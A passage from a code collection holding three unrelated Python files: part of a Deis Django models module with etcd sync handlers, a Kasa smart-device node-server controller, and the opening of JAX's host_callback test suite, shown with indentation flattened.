changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
"""
Public and private key pair used to secure application traffic at the router.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
# there is no upper limit on the size of an x.509 certificate
certificate = models.TextField(validators=[validate_certificate])
key = models.TextField()
# X.509 certificates allow any string of information as the common name.
common_name = models.TextField(unique=True)
expires = models.DateTimeField()
def __str__(self):
return self.common_name
def _get_certificate(self):
try:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
except crypto.Error as e:
raise SuspiciousOperation(e)
def save(self, *args, **kwargs):
certificate = self._get_certificate()
if not self.common_name:
self.common_name = certificate.get_subject().CN
if not self.expires:
# convert openssl's expiry date format to Django's DateTimeField format
self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
fingerprint = models.CharField(max_length=128)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'fingerprint'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
def save(self, *args, **kwargs):
self.fingerprint = fingerprint(self.public)
return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: release {} created".format(release.app, release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
if kwargs.get('created'):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
def _log_cert_added(**kwargs):
if kwargs.get('created'):
cert = kwargs['instance']
logger.info("cert {} added".format(cert))
def _log_cert_removed(**kwargs):
cert = kwargs['instance']
logger.info("cert {} removed".format(cert))
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
try:
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
except KeyError:
pass
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_publish_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
except KeyError:
# Ignore error when the directory already exists.
pass
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_cert(**kwargs):
cert = kwargs['instance']
_etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
_etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
cert = kwargs['instance']
try:
_etcd_client.delete('/deis/certs/{}'.format(cert),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_config(**kwargs):
config = kwargs['instance']
# we purge all existing config when adding the newest instance. This is because
# deis config:unset would remove an existing value, but not delete the
# old config object
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
for k, v in config.values.iteritems():
_etcd_client.write(
'/deis/config/{}/{}'.format(
config.app,
unicode(k).encode('utf-8').lower()),
unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
config = kwargs['instance']
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_domains(**kwargs):
domain = kwargs['instance']
_etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
domain = kwargs['instance']
try:
_etcd_client.delete('/deis/domains/{}'.format(domain),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
_etcd_client = get_etcd_client()
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
Controller.py |
from udi_interface import Node,LOGGER,Custom,LOG_HANDLER
import logging,re,json,sys,asyncio
from threading import Thread,Event
from node_funcs import get_valid_node_name,get_valid_node_address
#sys.path.insert(0,"pyHS100")
#from pyHS100 import Discover
from kasa import Discover
from nodes import SmartStripPlugNode
from nodes import SmartStripNode
from nodes import SmartPlugNode
from nodes import SmartDimmerNode
from nodes import SmartBulbNode
from nodes import SmartLightStripNode
#logging.getLogger('pyHS100').setLevel(logging.DEBUG)
# We need an event loop for python-kasa since we run in a
# thread which doesn't have a loop
mainloop = asyncio.get_event_loop()
class Controller(Node):
def __init__(self, poly, primary, address, name):
super(Controller, self).__init__(poly, primary, address, name)
self.poll = False
self.ready = False
self.hb = 0
self.nodes_by_mac = {}
self.discover_done = False
# For the short/long poll threads, we run them in threads so the main
# process is always available for controlling devices
self.short_event = False
self.in_short_poll = False
self.long_event = False
self.in_long_poll = False
self.Notices = Custom(self.poly, 'notices')
self.Parameters = Custom(self.poly, 'customparams')
self.poly.subscribe(self.poly.START, self.handler_start, address)
self.poly.subscribe(self.poly.POLL, self.handler_poll)
self.poly.subscribe(self.poly.LOGLEVEL, self.handler_log_level)
self.poly.subscribe(self.poly.CONFIGDONE, self.handler_config_done)
self.poly.subscribe(self.poly.DISCOVER, self.discover_new)
self.poly.ready()
self.poly.addNode(self, conn_status='ST')
def handler_start(self):
LOGGER.info(f"Started Kasa PG3 NodeServer {self.poly.serverdata['version']}")
self.Notices.clear()
self.mainloop = mainloop
asyncio.set_event_loop(mainloop)
self.connect_thread = Thread(target=mainloop.run_forever)
self.connect_thread.start()
self.setDriver('ST', 1)
self.heartbeat()
self.check_params()
try:
self.discover()
except:
LOGGER.error(f'discover failed', exc_info=True)
return False
self.ready = True
LOGGER.info(f'exit {self.name}')
# For things we only do have the configuration is loaded...
def handler_config_done(self):
LOGGER.debug(f'enter')
self.poly.addLogLevel('DEBUG_MODULES',9,'Debug + Modules')
LOGGER.debug(f'exit')
def handler_poll(self, polltype):
if polltype == 'longPoll':
self.longPoll()
elif polltype == 'shortPoll':
self.shortPoll()
def shortPoll(self):
if not self.discover_done:
LOGGER.info('waiting for discover to complete')
return
if self.in_short_poll:
LOGGER.info('Already running')
return
self.in_short_poll = True
if self.short_event is False:
LOGGER.debug('Setting up Thread')
self.short_event = Event()
self.short_thread = Thread(name='shortPoll',target=self._shortPoll)
self.short_thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.short_thread.start()
LOGGER.debug(f'Thread start st={st}')
# Tell the thread to run
LOGGER.debug(f'thread={self.short_thread} event={self.short_event}')
if self.short_event is not None:
LOGGER.debug('calling event.set')
self.short_event.set()
else:
LOGGER.error(f'event is gone? thread={self.short_thread} event={self.short_event}')
def _shortPoll(self):
while (True):
self.short_event.wait()
LOGGER.debug('enter')
asyncio.run_coroutine_threadsafe(self._shortPoll_a(), self.mainloop)
LOGGER.debug('exit')
self.short_event.clear()
async def _shortPoll_a(self):
LOGGER.debug('enter')
for node_address in self.poly.getNodes():
node = self.poly.getNode(node_address)
LOGGER.debug(f'node.address={node.address} node.name={node.name} ')
if node.poll:
await node.shortPoll()
self.in_short_poll = False
LOGGER.debug('exit')
def longPoll(self):
if not self.discover_done:
LOGGER.info('waiting for discover to complete')
return
if self.in_long_poll:
LOGGER.info('Already running')
return
self.in_long_poll = True
self.heartbeat()
if not self.discover_done:
LOGGER.info('waiting for discover to complete')
return
if self.long_event is False:
LOGGER.debug('Setting up Thread')
self.long_event = Event()
self.long_thread = Thread(name='longPoll',target=self._longPoll)
self.long_thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.long_thread.start()
LOGGER.debug('Thread start st={st}')
# Tell the thread to run
LOGGER.debug(f'thread={self.long_thread} event={self.long_event}')
if self.long_event is not None:
LOGGER.debug('calling event.set')
self.long_event.set()
else:
LOGGER.error(f'event is gone? thread={self.long_thread} event={self.long_event}')
def _longPoll(self):
while (True):
self.long_event.wait()
LOGGER.debug('enter')
asyncio.run_coroutine_threadsafe(self._longPoll_a(), self.mainloop)
self.long_event.clear()
LOGGER.debug('exit')
async def _longPoll_a(self):
LOGGER.debug('enter')
all_connected = True
for node_address in self.poly.getNodes():
node = self.poly.getNode(node_address)
if node.poll:
try:
if node.is_connected():
await node.longPoll()
else:
LOGGER.warning(f"Known device not responding {node.address} '{node.name}'")
all_connected = False
except:
pass # in case node doesn't have a longPoll method
if not all_connected:
LOGGER.warning("Not all devices are connected, running discover to check for them")
await self._discover_new_a()
self.in_long_poll = False
LOGGER.debug('exit')
def query(self):
self.setDriver('ST', 1)
self.reportDrivers()
self.check_params()
def heartbeat(self):
LOGGER.debug('hb={self.hb}')
if self.hb == 0:
self.reportCmd("DON",2)
self.hb = 1
else:
self.reportCmd("DOF",2)
self.hb = 0
def discover(self):
self.devm = {}
LOGGER.info(f"enter: {self.poly.network_interface['broadcast']} timout=10 discovery_packets=10 mainloop={self.mainloop}")
future = asyncio.run_coroutine_threadsafe(self._discover(), self.mainloop)
res = future.result()
LOGGER.debug(f'result={res}')
self.discover_done = True
LOGGER.info("exit")
async def discover_add_device(self,dev):
LOGGER.debug(f"enter: {dev}")
LOGGER.info(f"Got Device\n\tAlias:{dev.alias}\n\tModel:{dev.model}\n\tMac:{dev.mac}\n\tHost:{dev.host}")
self.add_node(dev=dev)
# Add to our list of added devices
self.devm[self.smac(dev.mac)] = True
LOGGER.debug(f"exit: {dev}")
async def _discover(self):
LOGGER.debug('enter')
await Discover.discover(timeout=10,discovery_packets=10,target=self.poly.network_interface['broadcast'],on_discovered=self.discover_add_device)
# make sure all we know about are added in case they didn't respond this time.
LOGGER.info(f"Discover.discover done: checking for previously known devices")
for mac in self.Parameters:
LOGGER.debug(f'checking mac={mac}')
if self.smac(mac) in self.devm:
LOGGER.debug(f'already added mac={mac}')
else:
cfg = self.get_device_cfg(mac)
LOGGER.debug(f'cfg={cfg}')
if cfg is not None:
LOGGER.warning(f"Adding previously known device that didn't respond to discover: {cfg}")
self.add_node(cfg=cfg)
LOGGER.debug('exit')
return True
async def discover_new_add_device(self,dev):
LOGGER.debug(f'enter: dev={dev}')
# Known Device?
await dev.update()
LOGGER.debug(f'dev={dev}')
smac = self.smac(dev.mac)
if smac in self.nodes_by_mac:
# Make sure the host matches
node = self.nodes_by_mac[smac]
if dev.host != node.host:
LOGGER.warning(f"Updating '{node.name}' host from {node.host} to {dev.host}")
node.host = dev.host
node.connect()
else:
LOGGER.info(f"Connected:{node.is_connected()} '{node.name}'")
if not node.is_connected():
# Previously connected node
LOGGER.warning(f"Connected:{node.is_connected()} '{node.name}' host is {node.host} same as {dev.host}")
await node.connect_a()
else:
LOGGER.warning(f'Found a new device, adding it... {dev.alias}')
self.add_node(dev=dev)
def discover_new(self):
LOGGER.info('enter')
if not self.ready:
LOGGER.error("Node is not yet ready")
return False
future = asyncio.run_coroutine_threadsafe(self._discover_new_a(), self.mainloop)
res = future.result()
LOGGER.debug(f'result={res}')
LOGGER.info("exit")
async def _discover_new_a(self):
await Discover.discover(target=self.poly.network_interface['broadcast'],on_discovered=self.discover_new_add_device)
# Add a node based on dev returned from discover or the stored config.
def add_node(self, parent=None, address_suffix_num=None, dev=None, cfg=None):
LOGGER.debug(f'enter: dev={dev}')
if parent is None:
parent = self
if dev is not None:
mac = dev.mac
if dev.is_bulb:
type = 'SmartBulb'
name = dev.alias
elif dev.is_strip:
type = 'SmartStrip'
# SmartStrip doesn't have an alias so use the mac
name = 'SmartStrip {}'.format(mac)
elif dev.is_plug:
type = 'SmartPlug'
name = dev.alias
elif dev.is_strip_socket:
type = 'SmartStripPlug'
name = dev.alias
elif dev.is_light_strip:
type = 'SmartLightStrip'
name = dev.alias
elif dev.is_dimmable:
type = 'SmartDimmer'
name = dev.alias
else:
LOGGER.error(f"What is this? {dev}")
return False
if address_suffix_num is None:
naddress = mac
else:
naddress = "{}{:02d}".format(mac,address_suffix_num)
LOGGER.info(f"Got a {type}")
cfg = { "type": type, "name": get_valid_node_name(name), "host": dev.host, "mac": mac, "model": dev.model, "address": get_valid_node_address(naddress)}
elif cfg is None:
LOGGER.error(f"INTERNAL ERROR: dev={dev} and cfg={cfg}")
return False
LOGGER.info(f"adding {cfg['type']} '{cfg['name']}' {cfg['address']}")
#
# Add Based on device type. SmartStrip is a unique type, all others
# are handled by SmartDevice
#
# LOGGER.error(f"alb:controller.py:{cfg['type']}")
if cfg['type'] == 'SmartPlug':
self.poly.addNode(SmartPlugNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
elif cfg['type'] == 'SmartStrip':
self.poly.addNode(SmartStripNode(self, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
elif cfg['type'] == 'SmartStripPlug':
self.poly.addNode(SmartStripPlugNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
elif cfg['type'] == 'SmartDimmer':
self.poly.addNode(SmartDimmerNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
elif cfg['type'] == 'SmartBulb':
self.poly.addNode(SmartBulbNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
elif cfg['type'] == 'SmartLightStrip':
self.poly.addNode(SmartLightStripNode(self, parent.address, cfg['address'], cfg['name'], dev=dev, cfg=cfg))
else:
LOGGER.error(f"Device type not yet supported: {cfg['type']}")
return False
# We always add it to update the host if necessary
node = self.poly.getNode(cfg['address'])
if node is None:
LOGGER.error(f"Unable to retrieve node address {cfg['address']} for {type} returned {node}")
else:
self.nodes_by_mac[self.smac(cfg['mac'])] = node
LOGGER.debug(f'exit: dev={dev}')
return node
def smac(self,mac):
return re.sub(r'[:]+', '', mac)
def exist_device_param(self,mac):
cparams = self.polyConfig['customParams']
return True if self.smac(mac) in cparams else False
def save_cfg(self,cfg):
LOGGER.debug(f'Saving config: {cfg}')
js = json.dumps(cfg)
self.Parameters[self.smac(cfg['mac'])] = js
def get_device_cfg(self,mac):
cfg = self.polyConfig['customParams'][self.smac(mac)]
try:
cfgd = json.loads(cfg)
except:
err = sys.exc_info()[0]
LOGGER.error(f'failed to parse cfg={cfg} Error: {err}')
return None
return cfgd
def handler_log_level(self,level):
LOGGER.info(f'enter: level={level}')
if level['level'] < 10:
LOGGER.info("Setting basic config to DEBUG...")
LOG_HANDLER.set_basic_config(True,logging.DEBUG)
else:
LOGGER.info("Setting basic config to WARNING...")
LOG_HANDLER.set_basic_config(True,logging.WARNING)
LOGGER.info(f'exit: level={level}')
def delete(self):
LOGGER.info('Oh No I\'m being deleted. Nooooooooooooooooooooooooooooooooooooooooo.')
def check_params(self):
pass
def update_profile(self):
LOGGER.info('start')
st = self.poly.updateProfile()
return st
def _cmd_query_all(self,command):
self.query()
for node_address in self.poly.getNodes():
node = self.poly.getNode(node_address)
if node.poll:
node.query()
def _cmd_update_profile(self,command):
self.update_profile()
def _cmd_discover(self,cmd):
self.discover_new()
id = 'KasaController'
commands = {
'QUERY': query,
'QUERY_ALL': _cmd_query_all,
'DISCOVER': _cmd_discover,
'UPDATE_PROFILE': _cmd_update_profile,
}
drivers = [
{'driver': 'ST', 'value': 1, 'uom': 25} ,
] |
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
import unittest
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import ad_checkpoint
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_client
from jax._src.lib import xla_bridge
xops = xla_client.ops
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require using not more than 2 devices.
return jax.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning("Deleting old XLA dump directory %s", dump_dir)
shutil.rmtree(dump_dir)
logging.warning("Setting XLA dump directory %s", dump_dir)
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = xla_bridge.get_backend()
c = jax.xla_computation(fun, backend='cpu')(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax, backend='cpu')(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.array(jax.devices()[:num_partitions * num_replicas])
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00 b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00 9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00 [] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, jax.jit(func)(5))
hcb.barrier_wait()
